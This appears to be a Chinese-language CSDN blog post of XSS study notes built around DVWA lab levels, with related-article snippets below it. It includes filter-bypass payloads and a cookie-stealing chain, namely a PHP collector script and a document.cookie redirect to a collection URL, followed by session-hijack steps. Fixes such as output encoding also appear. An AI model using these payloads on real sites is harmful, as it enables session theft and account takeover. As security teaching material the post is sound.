xss

最新推荐文章于 2024-07-09 18:08:01 发布
最新推荐文章于 2024-07-09 18:08:01 发布
阅读量4.4k 收藏 5
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liuy_uzhi/article/details/80973770
版权

1、XSS:跨站脚本攻击。cross-site scripting。本质:客户端代码注入漏洞,通常注入代码是js脚本。

存储型XSS

反射性xss

DOM型xss

手工检测XSS思路:

已知输出位置(1)输入敏感字符<>"'()&,看有没有转义

未知输出未知(1)"/><script>alert(1)</script>

如果显示区域不在html属性内使用模糊测试方案:

(1)<script>alert(document.cookie)</script>     普通注入

(2)"/><script>alert(document.cookie)</script>  闭合标签注入

 

2、(1)输入<xss>,元素中发现<xss>标签,实现注入

(2)弹窗测试<script>alert(/xxs/)</script>,成功注入js脚本;

js弹窗函数:(1)alert()         (2)confirm()            (3)prompt()

3、攻击者

(1)攻击者web设计   构造cookie.php      <?php $cookie = $_GET['cookie'];file_put_contents('cookie.txt',$cookie);?>

(2)构造攻击js      传递cookies到服务器的js字符串使用了document.cookie参数,但是我们用的是document.location中定义的url。

document.location='http://127.0.0.1/cookiestealer.php?c='+document.cookie;

<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>

(3)构造并发送攻击url   需要对参数进行url编码

(4)获取cookie

(5)劫持会话

JS写XSS cookie stealer来窃取密码的步骤详解

4、medium等级:源码

(1)弹窗测试<script>alert(/xxs/)</script>,发现服务端过滤了 script标签。通常只过滤一次,如何绕过:

技巧1:嵌套<scri<script>pt>alert(1)</script>,成功弹窗;

技巧2:大小写混合<Script>alert(/xxs/)</scripT>,成功绕过;

5、high等级:源码$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

8、xss漏洞的修复:

字符转义

imopossible:$name = htmlspecialchars( $_GET[ 'name' ] );

(1)用户的输入:不建议设置黑名单,设置白名单(限制规范),这样的控制在服务端做。存储型xss的长度绕过就是数据没有在服务端限制。

(2)xss的修复最重要的是服务端的输出过滤:

如果是输出到html中,进行html编码

如果是输出到js中,进行js转义

 

存储型xss:与反射型xss的利用代码一样。

1、存储型xss长度限制的绕过:就是数据没有在服务端限制(输入数据长度最大的限制,即maxlength=xx。由于其只是建立在前端浏览器的检测而已,所以可以通过客户端的开发者工具(按F12)或者通过burpsuite将maxlength的值改大或者直接删去便可)

liuy_uzhi
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
XSS
03-13
XSS,全称为“跨站脚本攻击”(Cross-Site Scripting),是网络安全领域常见的一种攻击方式,主要用于窃取用户的敏感信息,如cookies、会话令牌等。这种攻击通常发生在Web应用,攻击者通过注入恶意脚本,使得...
xss攻击
m0_62728880的博客
12-30 441
XSS概念: 跨站脚本攻击; 恶意攻击者往Web页面里插入恶意的Script代码,当用户浏览该页时,嵌入其Web里面的Script代码会被执行,从而达到恶意攻击用户的目的,用户信息可能造成泄漏. 实例 html部分: <ul class="content"> <li>文本</li> </ul> <input type="text" class="sendcon" placeholder="请输入内容"> js部分 ...
简单易懂的XSS(跨站脚本攻击)
weixin_47204991的博客
10-29 1873
跨站脚本(简称为XSS或跨站脚本或跨站脚本攻击)是针对Web应用程序的安全漏洞攻击,允许用户插入恶意的脚本,从而当用户浏览网页时,插入的脚本就会执行。从而达到攻击的目的。 1.反射型XSS 反射型XSS又叫非持久性XSS,反射型XSS注入的恶意代码不会保存在服务器端,需要欺骗用户去点击恶意链接才能攻击成功。一般通过XSS来窃取用户的cookie。 反射型XSS攻击流程: 2.存储型XSS 存储型XSS又叫持久型XSS,攻击脚本会永久存储在目标服务器。例如在个人信息或者留言板之类的地方插入恶意脚本,用户访
【网络安全的神秘世界】XSS基本概念和原理介绍
最新发布
weixin_54750312的博客
07-09 1015
恶意攻击者往web页面插入恶意代码脚本(JS代码),当用户浏览该页面时,嵌入web里面的JS代码会被执行,从而达到恶意攻击用户的目的。也叫持久型,常见的就是在博客留言版、反馈投诉、论坛评论等位置,将恶意代码和正文都存入服务端,每次访问都会触发恶意代码。我们可以构造恶意代码,观察远程服务器web日志,只要网站管理员访问,它的cookie值就被盗取。发现恶意代码被浏览器保存到页面了,访问其他网页再回来,仍会造成攻击,这就叫持久型。像刚才的攻击流程,攻击一次立马失效,这就叫非持久型。
XSS是什么?(Xmind配文详解)
weixin_55832111的博客
03-27 1万+
一张图带你详解XSS (话不多说上图) 一、什么是 XSS XSS全称(Cross Site Scripting)跨站脚本攻击,是最常见的Web应用程序安全漏洞之一,位于OWASP top 10 2013/2017年度分别为第三名和第七名,XSS是指攻击者在网页嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。 (是不是有人就会有疑问了,缩写不应该是CSS吗?因为CSS(层叠样式表)是一种用来表现文件样式的计算机
xss是什么以及如何防范
VegetableKCCCC的博客
08-31 2994
Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie、SessionID 等,进而危害数据安全。 为了和 CSS 区分,这里把攻击的第一个字母改成了 X,于是叫做 XSSXSS 的本质是:恶意代码未经过滤,与网站正常的代码混在一起;浏览器无法分辨哪些脚本是可信的,导致恶意脚本被执行。 而由于直接在用户的终端执行,恶意代码能够直接获取用户的信息,或
XSS详细讲解
liuqinhou的博客
06-06 4916
XSS蠕虫主要发生在用户之间存在交互行为的页面,当Web应用程序对用户输入的数据信息没有做严格的过滤时,通过结合Ajax的异步提交,就可以实现在植入恶意代码的同时,将恶意代码进行对外发送,即实现了代码的感染和传播,也就形成了XSS蠕虫。转义" &quto;即转义掉双引号,'转义掉单引号,(另一个要注意的是实际上html的属性可以不包括引号,因此严格的说我们还需要对空格进行转义,但是这样会导致渲染的时候空格数不对,因此我们不转义空格,然后再写html属性的时候全部带上引号)这样属性就不会被提前关闭了。
springboot整合XSS
03-20
本文将深入探讨如何在Spring Boot项目整合并预防XSS(Cross-Site Scripting)攻击。XSS是一种常见的网络攻击方式,通过注入恶意脚本到网页,来窃取用户数据或者执行恶意操作。 一、理解XSS攻击 XSS攻击主要...
xss特殊字符拦截与过滤
04-01
XSS攻击是指攻击者通过在Web页面插入恶意脚本代码,当其他用户浏览这些页面时,嵌入其的脚本就会执行,从而盗取用户信息或者篡改网页。本篇代码展示了如何通过编程手段拦截和过滤这些危险代码,保障Web应用程序的...
【PDF-XSS攻击】Java项目-上传文件-解决PDF文件XSS攻击
04-07
PDF-XSS实例文件
xss_javaxss_XSS_
10-04
在网络安全领域,XSS(Cross-Site Scripting)攻击是一种常见的威胁,它允许攻击者通过在网页注入恶意脚本,来劫持用户会话、窃取敏感信息或执行其他恶意操作。Java作为广泛使用的服务器端编程语言,也可能会遭遇...
XSS详解(译)
yifeng_peng的博客
01-10 5619
一、XSS 概述 什么是XSS? Cross-site scripting(XSS)是一种能够在他人浏览器执行恶意 JavaScript代码的代码注入攻击。 攻击者不需要直接接触受害者。他可以直接利用受害者访问的网站的漏洞来让恶意代码在其浏览器执行。对于受害者的浏览器来说,恶意的 JavaScript 代码表现的就像是网站合法的一部分,而网站的行为也完全不像是攻击者的帮凶。 恶意的 JavaS...
XSS漏洞学习笔记
jazzz98的博客
07-17 443
通常指黑客通过“HTML注入”纂改了页面,插入了恶意的脚本,从而在用户浏览页面时,控制用户浏览器的一种攻击。在一开始,这种攻击的演示案例是跨域的,所以叫“跨站脚本”。但是发展到今天,由于Javascript的强大功能以及网站前端应用的复杂化,是否跨域已经不再重要。但是由于历史原因,这个名字保留了下来。假设一个页面把用户输入的参数输出到页面上:1
XSS是什么?小白如何快速入门
weixin_43815032的博客
01-17 1454
一、XSS介绍 XSS攻击,通常指黑客通过“HTML注入”篡改网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的钓鱼/传播恶意代码等行为。 二、XSS的分类 1)反射型XSS 反射型XSS是指通过给别人发送带有恶意脚本代码参数的UR...
XSS简单总结
Aiwin的博客
07-11 1179
XSS的简单总结
XSS学习实践全过程!
jklbnm12的博客
09-16 3678
一:什么是XSS攻击? XSS 即(Cross Site Scripting)文名称为:跨站脚本攻击。XSS的重点不在于跨站点,而在于脚本的执行。那么XSS的原理是:恶意攻击者在web页面会插入一些恶意的script代码。当用户浏览该页面的时候,那么嵌入到web页面script代码会执行,因此会达到恶意攻击用户的目的。那么XSS攻击最主要有如下分类:反射型、存储型、及 DOM-based型。 反射性和DOM-baseed型可以归类为非持久性XSS攻击。存储型可以归类为持久性XSS攻击。 二:简单的工具
XSS获取Cookie过程简单演示
热门推荐
qq_36609913的博客
01-15 2万+
XSS: 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 本次演示将通过DVWA平台进行 实例: 打开
结合DVWA-存储型XSS
qq_43660551的博客
01-10 2997
一、低级 看下源码:trim()函数过滤掉name和message两边的空格。stripslashes()函数过滤掉“\”。但是未对name做任何过滤。所以考虑在name输入框进行注入。 尝试直接js代码注入。结果发现name输入框有长度限制,本人使用的火狐浏览器,f12,发现name长度为10,直接在代码里修改,比如为30。 然后再name输入框进行js代码注入。如: <script>alert(document.cookie)</script> <bod
什么是xss?
weixin_55539817的博客
08-27 8352
xss原理:xss又叫css,全称跨站脚本攻击。它是指攻击者往web页面或url里插入恶意JavaScript脚本代码且应用程序对用户输入的内容没有过滤,那么当正常用户浏览该页面时,嵌入在web页面的恶意JavaScript脚本代码会被执行,从而达到恶意攻击正常用户的目的。 漏洞的位置:数据交互与输出的地方。 漏洞产生的两个条件:1.用户可以控制的输入点。 2.输入能返回到前端的页面上被浏览器当成脚本语言解析执行。 xss漏洞的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值